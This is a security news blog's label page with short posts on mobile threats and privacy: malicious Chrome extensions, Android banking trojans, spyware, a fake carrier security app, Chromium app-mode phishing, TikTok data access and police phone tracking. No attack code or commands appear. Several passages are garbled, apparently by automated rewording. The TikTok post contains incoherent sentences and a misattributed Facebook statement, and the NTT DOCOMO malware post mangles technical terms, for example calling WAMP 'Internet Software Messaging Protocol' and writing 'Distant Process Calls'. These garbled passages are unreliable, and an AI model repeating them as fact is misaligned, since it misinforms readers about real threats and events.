Search This Blog

Showing posts with label Mobile Security. Show all posts

Malicious Chrome Extension Discovered Siphoning Private Data of Roblox Players


Customers at Roblox, the popular online game platform, are being targeted via malicious Google Chrome browser extension that attempts to siphon their passwords and private data. 

Threat analysts at Bleeping Computer uncovered two separate chrome extensions called SearchBlox, with more than 200,000 downloads, containing a backdoor that allow the hackers to steal users’ Roblox credentials and their Rolimons assets. 

It remains unclear clear whether the designer of these two extensions added the backdoor intentionally or if another hacker did, however, threat analysts were able to analyze their code and find the backdoor. 

The malicious extensions identified on the Chrome Web Store add a player search box to the users’ page that allows it to scan the game’s servers for other players. Although they have different icons, the extensions were both designed by the same developer and have identical descriptions. 

Surprisingly, the first extension was actually featured on the Chrome Web Store despite its three-star rating. Upon scanning the comment section on its review page, Roblox players seemed quite satisfied with the extension before the backdoor was suddenly added, which indicates that a threat actor was responsible and not its developer TheM2. 

To mitigate the potential threat, researchers advised Roblox players to uninstall the extension immediately, clear browser cookies, and alter the login credentials for Roblox, Rolimons, and other websites where they logged in while the extension was active. 

Additionally, the Google spokesperson confirmed that the extensions were removed immediately and would also be automatically erased from systems where they were installed. 

"The identified malicious extensions are no longer available on the Chrome Web Store," Google stated. The extensions are block listed and will be automatically removed from any user machine that previously downloaded them." 

This is not the first instance Roblox users have been the victims of cybercrime. Earlier this year in May, security experts identified a malicious file concealed inside the legitimate Synapse X scripting tool which is utilized to inject exploits or cheat codes into Roblox. 

Malicious hackers exploited Synapse X to deploy a self-executing program on Windows PCs that installs library files into the Windows system folder. This has the potential to break applications, corrupt or erase data or even send data back to the attackers responsible.

SharkBot Malware Targets Thousands of Android Users Via Disguised File Manager App


Variants of the SharkBot banking trojan were identified in multiple file manager Android applications on the Google Play Store, some of them with thousands of downloads. 

The majority of users who downloaded the trojanized apps were located in the U.K. followed by Italy, Iran, and Germany, security researchers at Bitdefender said in an analysis published this week. 

"The Google Play Store would likely detect a trojan banker uploaded to their repository, so criminals’ resort to more covert methods," reads the advisory. One way is with an app, sometimes legitimate with some of the advertised features, that doubles as a dropper for more insidious malware." 

This was the case with multiple file manager apps, which were disguised as such to justify the request for permission to install external packages from the user. 


"Of course, that permission is used to download malware," the researchers wrote. "As Google Play apps only need the functionality of a file manager to install another app and the malicious behavior is activated to a restricted pool of users, they are challenging to detect." 

While the applications identified by the researchers are no longer available on the Play Store, they can still be downloaded via multiple third-party stores, making them a huge threat. 

The first app examined by the researchers was 'X-File Manager,' designed by 'Viktor Soft ICe LLC' and counting over 10,000 installs before it was taken down by Google. 'FileVoyager' was the second one, manufactured by 'Julia Soft Io LLC' with nearly 5,000 downloads. 

The researchers discovered two more apps following an identical methodology, but they were never present on the Google Play store. They are called 'Phone AID, Cleaner, Booster' and 'LiteCleaner M' and were identified on the web via third-party app stores. 

The advisory published by the Bitdefender team comes weeks after threat analysts at Cleafy indicated the Android banking Trojan Vultur has reached more than 100,000 downloads on the Google Play Store.

Users who have downloaded the malicious apps are advised to delete them and change their bank account passwords immediately. Additionally, users are recommended to enable Play Store Protect and scan app ratings and reviews before downloading them.

Apple is Tracking Your Every Move, Here's All You Need to Know


Tech giant Apple projects itself as a privacy-focused firm, but according to the latest research, the company might be contradicting its own practices when it comes to collecting App Store data. 

According to a Twitter thread published by an iOS developer and security researcher Tommy Mysk, Apple tracks customers' activity via 'Directory Services Identifier' or DSLD which is linked to the customer’s iCloud and is able to collect private data like name, email address, and contacts. 

What’s more worrying is that the revelations reported in the thread state that even if customers switch off device analytics in the ‘Settings menu, the company deploys this dsId to other apps too. 

“Apple’s analytics data include an ID called “dsId”. We were able to verify that “dsId” is the “Directory Services Identifier”, an ID that uniquely identifies an iCloud account. Meaning, Apple’s analytics can personally identify you,” Mysk tweeted. 

However, the tech giant’s Device Analytics & Privacy document says that none of the user information collected is linked to that individual, suggesting that as a user, you would appear anonymous.

“None of the collected information identifies you personally. Personal data is either not logged at all, is subject to privacy preserving techniques such as differential privacy, or is removed from any reports before they’re sent to Apple. You can review this information on your iOS device by going to Settings > Privacy & Security > Analytics & Improvements and tapping Analytics Data,” the document reads.

Even though Apple continues to prattle that it is a privacy-oriented firm that values customers’ privacy and focuses to give them more control over what data they want to share or not share with advertisers and app designers, it can still employ DSLD for its own personal benefits, whatever those may be. 

Earlier this month, Gizmodo reported that a lawsuit was filed against Apple, with the plaintiff stating that Apple illegally siphons user data even when the firm's own privacy settings promise not to. The lawsuit was filed based on Mysk’s research; however, the researcher was unable to analyze the data in iOS 16 due to its encryption.

Data of UK and EU Users is Accessible to TikTok Staff in China


As part of an investigation by the BBC, it was disclosed that some of TikTok's workers had access to data from accounts in the UK and the European Union. These accounts have been made public by the Chinese company. 

As a result of a demonstrated need to do their work, Facebook said they had adopted the "privacy policy" as part of their "legal obligations." 

The company has come under scrutiny from authorities around the world in the past few years, including those from the UK and the US, over concerns over the possible transfer of data to Chinese officials. 

According to a report by the New York Times, the US government has called for the app to be banned in the country.
• US citizens can't be tracked by TikTok, the app's developers claim. 
• As far as I'm concerned, I've learned more on TikTok than I ever did in school. 

It has been stated that the policy applies to "the European Economic Area, the United Kingdom, and Switzerland" according to TikTok's website. 

As described in a statement on Wednesday by Elaine Fox, the platform's head of privacy and security for Europe, the platform's global team plays a key role in maintaining a "consistent, enjoyable, and safe" experience for users. 

Even though TikTok currently stores European user data in the US and Singapore, Ms. Fox explained that "we have allowed certain employees from our corporate group based in Brazil, Canada, China, Israel, Japan, Malaysia, Philippines, Singapore, South Korea, and the United States remote access to TikTok European user data." 

To limit the number of employees who have access to European user data, minimize data flows outside of the region, and store European user data locally, our main focus is on controlling access to European user data among employees. 

Additionally, she said the approach was subject to a series of robust security controls and approval protocols, and it was conducted in compliance with the General Data Protection Regulations (GDPR) regarding personal data use. 

An official at the US Communications Watchdog, the country's leading watchdog for communications, made the announcement the same week that he recommended a ban on TikTok. 

Brendan Carr, one of the commissioners at the Federal Communications Commission (FCC), told the Washington Post that there does not appear to be anything other than a ban as a solution to the problem.

There is no way in this world where you can come up with adequate protection. This is because the Chinese communist party will not fall into the hands of the Chinese communist regime. This is because he did not believe there was a world in which such protection could be implemented. 

In a series of interviews, ByteDance, the company behind TikTok, has denied that the organization is controlled by the Chinese government. 

Authorities in the UK, EU and the United States have systematically monitored the app for the past few years. 

The investigation is underway 

As a result of the public concern expressed in August by MPs regarding the risks of data being disclosed to the Chinese government, the UK Parliament closed the account for its TikTok service.

According to senior MPs and members of the parliament, the account should be removed until TikTok can give "credible assurances" that it will not be used to leak data to Beijing until that time. 

The Irish Data Protection Commission has also investigated the app about two privacy-related issues for which it acts as a lead regulator in the EU. 

A watchdog has begun investigating TikTok's processing of the personal data of children as part of a monitoring program. The company is also investigating whether its actions regarding the transfer of personal data overseas to other countries have been by EU law, for instance, to China. 

The same year, a US security panel ordered ByteDance to sell off its American operations. This was due to concerns that users' data may be shared with Chinese authorities, prompting ByteDance to sell off its American operations. 

In June this year, TikTok said it had migrated US users' information to servers run by American software giant Oracle in Austin, Texas. 

As reported last month, TikTok denied the report that a Chinese team at ByteDance was planning on using the app to track the locations of American citizens while they use the app. 

According to the social media company, TikTok has never been used as an instrument of targeting by the American government, activists, public figures, or journalists. 

Ms. Fox said on Wednesday that the app does not collect precise location data from its users in Europe, which is according to the European Union. 

With almost 4 billion downloads, TikTok is the world's fastest-growing social media app and has become one of the most popular in the world. 

According to analysis company Sensor Tower, the company has garnered more than $6.2 billion (£5.4 billion) in gross revenue from in-app purchases since its launch in 2017. It tracks trends related to mobile apps.

FCC Commissioner Brendan Carr Calls Out for Tik Tok Ban in US


The US government should take action to ban TikTok rather than negotiate with the social media app, Brendan Carr, one of five commissioners at the Federal Communications Commission, told a local media outlet in an interview. 

With more than 200 million downloads in the U.S. alone, the app’s immense popularity is concerning because ByteDance, a Chinese company, owns it. That means there’s potential for data on US residents to flow back to China. However, the FCC has no power to ban TikTok directly, but Congress previously acted after Carr raised concerns regarding Chinese telecom firms, including Huawei. 

TikTok is currently in negotiations with Council on Foreign Investment in the U.S. (CFIUS), a multi-agency government body charged with reviewing business deals involving foreign ownership, to determine whether it can be divested by ByteDance to an American firm and remain operational in the United States. 

Earlier this year in September, the New York Times reported, that a deal was taking shape but not yet in its final form and that Department of Justice official Lisa Monaco was concerned the deal did not provide enough insulation from China. 

"I don’t believe there is a path forward for anything other than a ban," Carr said, citing recent incidents regarding how TikTok and ByteDance managed American consumer's data. “Perhaps the deal CFIUS ends up cutting is an amazing, airtight deal, but at this point, I have a very, very difficult time looking at TikTok’s conduct thinking we’re going to cut a technical construct that they’re not going to find a way around.” 

A few months ago, Carr sent letters to Apple and Google asking the tech giants to remove TikTok from their respective app stores. The commissioner is now calling for a nationwide ban despite the efforts made by both parties – the US government and TikTok – to come to an agreement. 

“Commissioner Carr has no role in or direct knowledge of the confidential discussions with the US government related to TikTok and is not in a position to discuss what those negotiations entail” a TikTok spokesperson responded. “We are confident that we are on a path to reaching an agreement with the US government that will satisfy all reasonable national security concerns.” 

For now, it’s still business as usual for a Chinese app in the US, though it may be a good idea for creators to have a backup plan in case of a ban. YouTube Shorts is a good option, and it pays better too.

Countering Financial Data Leak in the Era of Digital Payments


Over the past five years, there has been a huge surge in the usage of financial services technologies and with that, the risk of a financial data breach has also increased. Multiple financial services technologies use screen scraping to access the private banking data of consumers.

 Screen scraping is a technology by which a customer provides its banking app login credentials to a third-party provider (TTP). The TTP then sends a software robot to the bank’s app or website to log in on behalf of the user and access data.

“The way consumers traditionally connect to their bank accounts is facilitated through screen scraping, where providers require internet banking login information,” explained Joe Pettersson, Chief Technology Officer at Banked. 

One safer alternative to screen scraping is APIs, which let two systems work together. Here are the three benefits of using API: 

Easier for developers 

APIs come with inbuilt documentation, which helps developers code between two systems with a common language. So, they don’t have to learn the details of a full fraud prevention engine’s code, they only need to look at the documentation to understand exactly how quickly they can access certain functions. Once again, this saves time and effort for the whole IT team and helps in making the fraud system more cost-effective. 

Good for Scaling

 Regardless of how efficient a person is, there’s simply no way to review all the user data manually. This is where APIs play an important role by offering fast queries and responses for hundreds of thousands of user logins, transactions, or signups. 

Automates everything 

Because APIs are linked to web apps, there’s no need to regularly tweak them or wait for IT updates. All the fixes and improvements are made from the server side, so individuals can focus on their business instead. It’s not only cheaper in terms of IT resources, but also much more efficient and faster.


To mitigate fraud risk, propagating knowledge and awareness of new payment technologies, channels, and products, and the risks involved — to both customers and employees — is a crucial part of a fraud prevention strategy. Embedding the fraud management process into overall customer engagement and experience should be the first step forward.

Change These Settings to Prevent Your Android From Tracking You


You are being watched at every turn in today's connected world. You can have different kinds of apps and websites to track and collect your data for a wide range of purposes, both for personal and commercial use. A prominent example of this can be seen when Apple utilizes your data to process your transactions. Twitter can serve you with relevant advertisements, and Life360 can help it improve its location services based on your information.

There are, however, some apps and websites that utilize your personal information for the greater good, but not all of them. The same applies to your privacy, so it is always a wise idea to protect it as much as possible. 

The steps below are designed to help you stop your Android device from tracking you if you are using one. This includes deleting your web and app activity history, turning off your apps' location access, and disabling unnecessary location settings. 

By taking advantage of your location history 

The GPS feature of your Android phone is probably the most powerful way to track your location when using the phone. By signing into your Google account and allowing Location History to be enabled, Google can keep track of every place you visit when you are signed in. Several benefits can be gained from it, such as personalized maps, traffic reports, and the ability to find your phone when it is lost. These can enhance your experience in many ways. 

On the other hand, if you do not want Google following you everywhere, you can turn off location history. Here are the steps you need to follow to do so: 

  • Open the Settings app on your mobile device.
  • Open the Google search engine.
  • On the Google Account page, tap on "Manage your Google Account."
  • Click on the tab labeled "Date & privacy."
  • Next, below the History settings, select Location History. 
  • After that tap the "Turn off" button. 
  • Eventually, a dialog box will pop up, tap on "Pause". 
Regardless of whether you wish to delete your Location History or not, you can do so. As a result, you can remove data from the last 3, 18, or 36 months. 

You can set up Google to automatically delete your account by following these steps: 

  • Open Google Maps. 
  • Click on your profile icon. 
  • Select the timeline you wish to delete. 
  • Towards the top-right corner, click on the More icon (three vertical dots). 
  • Select "Settings and privacy" from the menu.
  • Under "Location settings," choose "Automatically delete Location History." 
  • Select "Auto-delete activity older than." 
  • From the drop-down menu, choose either three, 18, or 36. 
  • Tap Next. 
  • Select Confirm. 
  • Tap on the "Got it" button to exit. 

Your data will be automatically deleted from your account within the next few days if it has been older than the specified months. 

Tracing web and app activity 

Several settings on your phone can save your location, including Location History. The Web & App Activity gives you the same information as well as a lot more. Whenever you decide to enable Web & App Activity in your Google Account (via Google), you will be able to see the information you have entered and the location, IP address, ads you clicked, and even the things you have purchased (by Google). The following steps will guide you through the process of turning off this setting: 
  • Launch your Settings app. 
  • Scroll down and tap on Google. 
  • Select "Manage your Google Account." 
  • Navigate to the "Data & privacy" tab. 
  • Under "History settings," select "Web & App Activity." 
  • Click the "Turn off" button to disable Web & App Activity. 
  • Tap on Pause.
  • Click "Got it" to exit. 
  • Back on the "Web & App Activity" page, tap on the "Choose an auto-delete option" to automatically delete saved data. 
  • Select "Auto-delete activity older than."
  • From the drop-down menu, choose whether to delete saved data older than three, 18, or 36 months.
  • Click on Next. 
  • Select Confirm. 
  • Tap on "Got it" to exit. 

Update your location settings 

Additionally, you should also make sure that settings for your phone's location are changed, as well as blocking Google from saving your location. The settings you can turn off include the following:


Scanners that help you locate nearby Wi-Fi and Bluetooth devices: The phone can detect nearby Wi-Fi and Bluetooth devices so it can get better location information based on their locations.

Location Services for Emergency Responses: Provides emergency responders with the ability to pinpoint your location when an emergency occurs.

Using the sensors on your phone, Wi-Fi, and the network of your mobile device, Google Location Accuracy improves the location information provided by your phone.

The steps listed below will guide you through the process of managing these settings (via Google): 

  • Launch the Settings app. 
  • Select Location. 
  • Toggle the slider off for "Use location" on top of the screen. 
  • Select "Wi-Fi and Bluetooth sharing." 
  • Turn off the sliders for both "Wi-Fi scanning" and "Bluetooth scanning." 
  • Return to the Location screen by clicking the Back button.
  • Select Advanced.
  • Tap on Emergency Location Service. 
  • Toggle the slider off if you prefer to do so. 
  • Return to the Location screen. 
  • Tap on Google Location Accuracy. 
  • Toggle the slider off next to "Improve Location Accuracy." 

Edit your device's permissions 

Location access is required by the majority of apps, if not all, so that you can get the best possible experience. If you live in a place where Facebook uses your location as an algorithm, you will be able to automatically include it when you post about it, find nearby places, and receive relevant ads.

By navigating to settings > Location > App access to location (via Google), you will be able to see which apps have access to your location and how they do it. The apps here fall under three categories: permitted all the time, permitted only while in use, and not permitted at all. If you have apps under "allowed all the time" and "available only while in use" that you want to remove location access to, simply tap the app. Then, select "Don't allow." 

The app will perform closer to your actual location if you enable the "Use precise location" toggle button for Android 12. This is only available when the app is running on Android 12, and when it does it uses your exact location. By switching this off, you will be able to see your approximate location instead of your exact location when you turn this off. Your location will appear to be somewhere within a radius of three kilometers of the actual location of the device. 

Check your Google Chrome settings 

It is common for you to come across websites when you are browsing the internet that will wish to know where you are located. A certain amount of help can be obtained from this method in some cases. Using a hardware retailer's website, for example, will allow it to display the closest hardware store near you, based on the information you provided on the company's website. 

You can check what websites currently have access to your location from your Google Chrome (via Google).

  • Launch the app. 
  • Tap on the More icon (three vertical dots) in the top-right corner of the screen. 
  • Select Settings. 
  • Scroll down to the "Advanced" section. 
  • Tap on Site settings. 
  • Select Location. 
  • Expand the "Allowed" section to check all the apps that can see your location. 
It is very simple to remove a site's location access by simply tapping on the site you wish to remove it from. Next, select the Block option from the drop-down menu. In addition, you can also turn off the location-sharing feature of Google Chrome to prevent it from tracking your location at all. By disabling this feature, you do not have to share your location with any sites you visit. Alternatively, if you are particularly concerned about the security of your data, you can consider switching to Tor or Firefox as alternative Android browsers. 

The advertising ID should be turned off

In today's world, ads are becoming more and more sophisticated. After researching plaid skirts one day, the next day you will be bombarded with advertisements for plaid skirts that you have never seen before. The ads online act as if they are watching every move you make and know exactly what you like before they ever reach your computer. Here, you will find instructions on how to disable this feature on your Android device (via Google). 

  • Launch your Settings app. 
  • Open Google.
  • Tap on "Manage your Google Account." 
  • Navigate to the "Data & privacy" tab. 
  • Under Ad settings, tap on "Ad personalization." 
  • Toggle off the slider next to "Ad personalization is ON." 
  • Select Turn off in the pop-up box. 
  • Tap on "Got it" to exit. 

However, disabling ad personalization does not mean you will stop seeing ads moving forward. They will still be there, but the upside is that they will only be general ads, not creepy personalized ones. 

If you disable ad personalization from your device, you may still see ads in the future despite disabling them.

This Unofficial WhatsApp Android App Caught Stealing Users’ Accounts


Kaspersky researchers discovered 'YoWhatsApp,' an unofficial WhatsApp Android app that steals access keys for users' accounts. Mod apps are promoted as unofficial versions of genuine apps that include features that the official version does not. 

YoWhatsApp is a fully functional messenger that supports extra features such as customising the interface and blocking access to specific chats. The tainted WhatsApp app requests the same permissions as the original messenger app, such as SMS access.

“To use the WhatsApp mod, users need to log in to their account of the legitimate app. However, along with all the new features, users also receive the Triada Trojan. Having infected the victim, attackers download and run malicious payloads on their device, as well as get hold of the keys to their account on the official WhatsApp app.” reported Kaspersky. 

“Along with the permissions needed for WhatsApp to work properly, this gives them the ability to steal accounts and get money from victims by signing them up for paid subscriptions that they are unaware of.”

This mod instals the Triada Trojan, which is capable of delivering other malicious payloads, issuing paid subscriptions, and even stealing WhatsApp accounts. More than 3,600 users have been targeted in the last two months, according to Kaspersky. The official Snaptube app promoted the YoWhatsApp Android app.

The malicious app was also discovered in the popular Vidmate mobile app, which is designed to save and watch YouTube videos. Unlike Snaptube, the malicious build was uploaded to Vidmate's internal store. YoWhatsApp v2.22.11.75 steals WhatsApp keys, enabling threat actors to take over users' accounts, according to Kaspersky researchers.

In 2021, Kaspersky discovered another modified version of WhatsApp for Android that offered additional features but was used to deliver the Triada Trojan. FMWhatsApp 16.80.0 is the modified version.

The experts also discovered the advertisement for a software development kit (SDK), which included a malicious payload downloader. The FMWhatsapp was created to collect unique device identifiers (Device IDs, Subscriber IDs, MAC addresses) as well as the name of the app package in which they are deployed.

To be protected, the researchers advise:
  • Only install applications from official stores and reliable resources
  • Remembering to check which permissions you give installed applications – some of them can be very dangerous
  • Installing a reliable mobile antivirus on your smartphone, such as Kaspersky Internet Security for Android. It will detect and prevent possible threats.
Kaspersky concluded, “Cybercriminals are increasingly using the power of legitimate software to distribute malicious apps. This means that users who choose popular apps and official installation sources may still fall victim to them. In particular, malware like Triada can steal an IM account, and for example, use it to send unsolicited messages, including malicious spam. The user’s money is also at risk, as the malware can easily set up paid subscriptions for the victim.”

iPhone 14 Crash Detection Feature Contacts Emergency Services on Roller Coasters


Apple's Crash Detection feature on iPhone 14 perceives some roller coaster rides in amusement parks as a severe car crash and proceeds to call 911. 

According to the Wall Street Journal (WSJ), there have been several incidents where an iPhone 14 has contacted 911 during a roller coaster ride and conveyed the message "The owner of this iPhone was in a severe car crash and is not responding to their phone." 

The crash detection system was introduced in the new iPhone 14 and Apple Watch Series 8, Ultra, and SE with the latest OS earlier this year. 

Between September 18 and October 9, the Warren County Communications Center received 12 calls conveyed by iPhones while their users were riding a Kings Island coaster, stated Melissa Bour, director of Warren County emergency services. 

Roller coaster riders have also described instances where the crash detection feature has been triggered because phones were dropped while their vehicle was moving. “I was on a motorcycle ride today and my new iPhone 14 pro flew off my handlebars on the highway. RIP. I immediately drove to apple to get a new temp phone sorted. Meanwhile, my whole family thought I was dead. The iPhone 14 sent out crash alerts to my circle,” Douglas Sonders tweeted. 

According to Sara White, a 39-year-old dentist, her iPhone automatically contacted 911 when she went to Mystic Timbers at Kings Island. The wooden roller coaster is 109 feet tall with top speeds of 53 mph. 

“The owner of this iPhone was in a severe car crash and is not responding to their phone,” an automated voice says in the call to 911, before also providing longitude and latitude coordinates. Screams from others on the ride can be heard in the background of the call. 

Warren County Emergency Services set up a text message alert system earlier this year to help individuals who were injured in a road accident. The feature wasn’t designed to help with calls triggered by “crash detection.” “It's saying that there's a crash that's been detected, so that's a little different than the 911 hang ups or silences,” Bour added. “So we make up a call for a crash with unknown injuries, because we haven't spoken to anyone, and then once that call is made up, it gets dispatched out to the police officer.” 

The crash detection feature has the potential to save a lot of lives, but wasting the time of emergency workers could also backfire. We also need to consider how new the iPhone 14 is, meaning this problem is only set to get worse as millions more handsets are purchased over the coming months. 

The tech giant may roll out an update in the near future to differentiate a roller coaster from a car crash, but in the meantime, iPhone owners are recommended to put their iPhone 14 on Airplane Mode or disable Crash Detection before getting on the coaster (Settings -> Emergency SOS -> Call After Severe Crash toggle).

Malicious Actors Are Exploiting ‘App Mode’ in Chromium Browsers for Phishing Attacks


Thanks to a new phishing technique, malicious actors could siphon private details by merely impersonating legit login forms in Application Mode. 

The Application Mode feature can be accessed in all Chromium-based browsers, which includes Google Chrome, Microsoft Edge, and Brave. 

According to mr.d0x, a security researcher who has also unearthed the Browser-in-the-Browser (BitB) attack and Microsoft WebView2 phishing methods previously, desktop applications are normally harder to spoof, hence, victims don’t pay much attention to as compared to browser windows that are more widely exploited for phishing. 

Chrome's application mode is created to provide native-like experiences in a manner that causes the website to be launched in a separate browser window, while also showing the website's favicon and concealing the address bar. 

Additionally, the hacker-controlled malicious site can employ JavaScript to perform multiple operations, such as immediately closing the window when the victim inputs the credentials or resizing and positioning it to gain the desired result. 

It's worth noting that the methodology works on other operating systems as well, including macOS and Linux, making it a possible cross-platform threat. However, the effectiveness of the assault depends on the hacker gaining control over the computer before following up with this phishing technique, be it via malware or through directing the victim to enable it and run a Windows shortcut with the malicious URL. 

Meanwhile, Google is discontinuing support for Chrome apps in favor of Progressive Web Apps (PWAs) and web-standard technologies, and the feature is likely to be completely phased out in Chrome 109 or later on Windows, macOS, and Linux. 

"The --app feature was deprecated before this research was published, and we are taking its potential for abuse into account as we consider its future. Users should be aware that running any file provided by an attacker is dangerous. Google's Safe Browsing helps protect against unsafe files and websites,” Google stated.

“While Safe Browsing is enabled by default in Chrome, users may want to enable Enhanced protection, which inspects the safety of your downloads to better warn you when a file may be dangerous. Enhanced protection can be found in Chrome Settings > Privacy and security > Security.We encourage the security research community to continue to report issues and vulnerabilities through our vulnerability rewards program:"

Iranian Hackers Employ Novel RatMilad Spyware to Target Enterprise Android Users


Earlier this week, threat analysts at mobile security firm Zimperium Inc. zLabs detailed a newly unearthed form of Android spyware leveraged to target enterprise devices in the Middle East. 

Dubbed “RatMilad,” the original version of the spyware was identified as concealing behind a VPN and phone number spoofing app called Text Me. After discovering the spyware, the researchers also spotted a live sample of the malware family distributed through NumRent, an updated version of Text Me.

According to Zimperium, an Iran-based hacker group named AppMilad is distributing the phone spoofing app via links on social media and communication tools like Telegram, luring unsuspecting users into sideloading the app and granting it extensive permissions. Moreover, fraudsters have designed a product website to distribute the app and trick users into believing that it is an authentic app. 

Since the malicious app can trick users into obtaining a broad range of permissions, it can gain access to sensitive device data, such as location and MAC address, and user data, including phone calls, contact numbers, media files, and SMS messages. 

"Once installed and in control, the attackers could access the camera to take pictures, record video, and audio, get precise GPS locations, view pictures from the device, and more," Zimperium researcher Nipun Gupta stated.

Additionally, the hackers can access the camera and microphone of the device, which allows them to record audio/video and capture photos. Other features include collecting clipboard data, SIM information, and performing read/write activities. 

The scale of the infections is unknown, but the cybersecurity firm said it identified the spyware during a failed compromise attempt of a user's enterprise device. A post published on a Telegram channel employed to distribute the malware sample has been viewed over 4,700 times with more than 200 external shares, indicating a limited range.

"The RatMilad spyware and the Iranian-based hacker group AppMilad represent a changing environment impacting mobile device security," Richard Melick, director of mobile threat intelligence at Zimperium, explained. From Pegasus to PhoneSpy, there is a growing mobile spyware market available through legitimate and illegitimate sources, and RatMilad is just one in the mix." 

Prevention tips 

The easiest method to avoid falling victim to fake Android apps employed to propagate spyware and malware is to download new apps from official app stores like the Google Play Store, the Amazon Appstore, and the Samsung Galaxy Store. 

Additionally, the users are recommended to scan the app that is sideloaded onto a device and increase the mobile attack surface leaving data and users at risk.

Thousands of Users Impacted in Revolut Data Breach


Financial technology firm Revolut has suffered a massive data breach that may have allowed hackers to access the private details of over 50,000 users. 

The fintech giant, which has a banking license in Lithuania, described the assault as “highly targeted” and stated the hacker only had access to 0.16% of customers’ data for a “short period” of time. 

“We immediately identified and isolated the attack to effectively limit its impact and have contacted those customers affected. Customers who have not received an email have not been impacted,” Revolut spokesperson Michael Bodansky explained. To be clear, no funds have been accessed or stolen. Our customers’ money is safe – as it has always been. All customers can continue to use their cards and accounts as normal.”  

However, according to Revolut’s breach disclosure to the authorities in Lithuania, the firm says nearly 50,150 global customers, including 20,687 in the European Economic Area (EEA) and 379 Lithuanian citizens, may have been impacted by the data breach. The leaked data includes names, postal and email addresses, telephone numbers, partial card details, and bank account information.  

Soon after the attack, multiple Revolut users complained regarding obscene texts received via the application’s chat feature. Some customers also reported getting text messages directed to a Revolut phishing website. It’s unclear if these events are related to the breach. 

In its data breach notification to affected users, Revolut warned impacted users to be on high alert for follow-on phishing and fraud scams using leaked details. 

“Cyber-criminals are constantly looking for ways to make money at your expense and try to exploit human emotions in order to extract the information they need directly from you using social engineering techniques. Scammers usually follow the same principle – they try to force you to take actions without thinking about them after starting an emotional conversation,” the company warned users. 

“Malicious persons and fraudsters may try, using the publicized information about this breach of personal data security, to trick you with various login or other important personal data, offer some fictitious services and ask you to pay for them.” 

According to Forbes, London-based Revolut is UK’s most valuable fintech startup currently valued at $33 billion. It has over 20 million customers in 200 nations but is most popular in Europe and the UK. The app-based bank was established in 2015 by Russia-born Nikolay Storonsky and Ukraine-born Vlad Yatsenko.

Japanese Payment System Attacked By Fake Security App

A new malware has been observed by the Research team at McAfee Corp. This malware is found to be attacking NTT DOCOMO customers in Japan. 

The malware that is distributed via the Google Play Store pretends to be a legitimate mobile security app, but in reality, it is a fraud malware designed to steal passwords and abuse reverse proxy focusing on NTT DOCOMO mobile service customers. 

The McAfee Cell Analysis team informed Google regarding the notoriety of the malware. In response, Google has made the application unavailable in Google Play Store and removed known Google Drive files that are associated with the malware. In addition to this, Google Play Shield has now alerted the customers by disabling the apps and displaying a warning. 

The malware publishes malicious fake apps on Google Play Store with various developer accounts that appear like some legitimate apps. According to a tweet by Yusuke Osumi, a Security Researcher at Yahoo, the attacker lures the victims into installing the malware in their systems by sending them an SMS message with a Google Play Store link, reportedly sent from overseas. Additionally, they entice the users by displaying a requirement to update their security software. 

This way, the victim ignorantly installs the fraudulent app from Google Play Store and ends up installing the malware. The malware asks the user for a community password but cleverly enough, it claims the password is incorrect, so the user has to enter a more precise password. It does not matter if the password is incorrect or not, as this community password can later be used by the attacker for the NTT DOCOMO fee services and gives way to online funds. 

Thereafter, the malware displays a fake ‘Mobile Security’ structure on the user’s screen; the structure of this Mobile Security structure interestingly resembles that of an outdated display of McAfee cell security. 

How does the malware function

A native library called ‘’ written in Golang, is loaded through the app execution. When the library is loaded, it attempts to connect with C&C servers utilizing an Internet Socket. WAMP (Internet Software Messaging Protocol) is then employed to speak and initiate Distant Process Calls (DPC). When the link is formulated, the malware transmits the community data and the victim’s phone number, registering the client’s procedural commands. The connection is then processed when the command is received from the server like an Agent. Wherein, the socket is used to transmit the victim’s Community password to the attacker, when the victim enters his network password in the process.

The attacker makes fraudulent purchases using this leaked information. For this, the RPC command ‘toggle_wifi’ switch the victim’s Wi-Fi connection status, and a reverse proxy is provided to the attacker through ‘connect_to’. This would allow connecting the host behind a Community Handle Translation (NAT) or firewall. With the help of a proxy, now the attacker can ship by request through the victim’s community network. 

Along with any other methods that the attackers may use, the malware can also use reverse proxy to acquire a user’s mobile and network information and implement an Agent service with WAMP for fraudulent motives. Thus, it is always advised by Mobile Security Organizations to be careful while entering a password or confidential information into a lesser-known or suspicious application.

US Law Enforcement Agencies Employ Obscure Phone Tech to Track People Movements


Multiple law enforcement agencies in Southern California and North Carolina are employing a powerful but relatively inexpensive cellphone tool dubbed ‘Fog reveal’ to track individual devices without a warrant based on data collected from apps installed on citizens’ smartphones. 

According to a detailed report published by the Associated Press based on documents extracted by the Electronic Frontier Foundation (EFF), the tool provided US police the ability to scan billions of records from 250 million mobile devices and harness the ensuing data to create “patterns of life” for each individual, which also included homes and workplaces locations. 

Fog Reveal was designed by Virginia-based Fog Data Science and is reportedly used extensively by law enforcement agencies in the US to solve criminal cases. 

According to AP, the surveillance software collected the data in a searchable way and designed software able to sift through it in a sophisticated way. Subsequently, the app makers sold the software in about 40 contracts to nearly 20 agencies, with prices starting at $7,500 a year. 

The technology is controversial as US courts are still weighing the use of location data, and the latest such ruling from the US Supreme Court held that law enforcement agencies would require a warrant in most cases, to access records of users’ movements and location. 

Additionally, mobile geolocation data of individuals should only be requested from Google (Android devices) or Apple (iPhones and iPads) by police forces in possession of a warrant released by a court.

The Virginia-based firm defended this claim by arguing that its data is anonymized, with the company not having any way of linking signals back to a specific device or owner. At the same time, some of the documents obtained by AP suggest police forces may be able to deanonymize the data to identify and locate specific individuals. 

The AP investigation primarily relied on public records (including GovSpend and Freedom of Information Act requests) and internal emails extracted by the local news outlet. The report comes days after the US military and intelligence agencies revealed a new monitoring operation to guard electoral procedures from hacking and fake news before and during the November midterms elections.

Over 1800 Mobile Apps Found Exposing AWS Credentials

Experts find hard-coded AWS credentials

Experts have found 1,859 applications across Android and iOS that contain hard-coded Amazon Web Services (AWS) credentials, becoming a major security threat. More than 77% of the apps contain valid AWS access tokens that allow access to private AWS cloud services. 

Mobile apps may contain vulnerabilities in the supply chain that can potentially cause exposure to sensitive data, which can be used by hackers for other attacks. Supply chain vulnerabilities in mobile apps are often added by app developers, intentionally or unintentionally. 

The developers don't know the downside of the security impacts, putting the app users' privacy, as well as the employer and organizations' privacy at risk too. 

Source of the Problem

Researchers at Broadcom Software looked into why and where exactly the AWS access tokens were inside the applications, and whether present in other apps too. They found over half (53%) of the apps were using the same AWS access tokens found in other apps. 

These apps, interestingly, were from different app developers and organizations. This way, the experts found a supply chain vulnerability, it could be traced to a shared library, third-party SDK, or other shared components used in making the apps. 

Why app developers are using hard-coded access keys?

